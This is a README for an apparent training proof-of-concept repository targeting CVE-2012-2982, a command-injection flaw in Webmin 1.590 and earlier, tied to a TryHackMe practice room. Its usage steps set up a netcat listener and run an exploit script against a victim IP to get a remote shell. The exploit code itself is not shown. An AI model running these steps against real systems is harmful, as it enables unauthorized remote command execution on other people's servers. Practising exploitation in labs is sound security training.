Practice POC scripting in Tryhackme’s intro poc scripting room (For Linux)# CVE-2012-2982
## Description
file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.
## Installation
1. `git clone https://github.com/CpyRe/CVE-2012-2982.git`
2. `pip3 install -r requirements.txt`
## Usage
1. `nc -nlvp <port>`
2. `python3 exp.py <myip> <vulnip> <port>`
OR
`python3 subprocess-exp.py <myip> <vulnip> <port>`
3. RCE!!
[4.0K] /data/pocs/b0d4691d1f8d163170d0f1425453dbc311c7d53d
├── [1.1K] exp.py
├── [ 515] README.md
├── [ 52] requirements.txt
└── [1.7K] subprocess-exp.py
0 directories, 4 files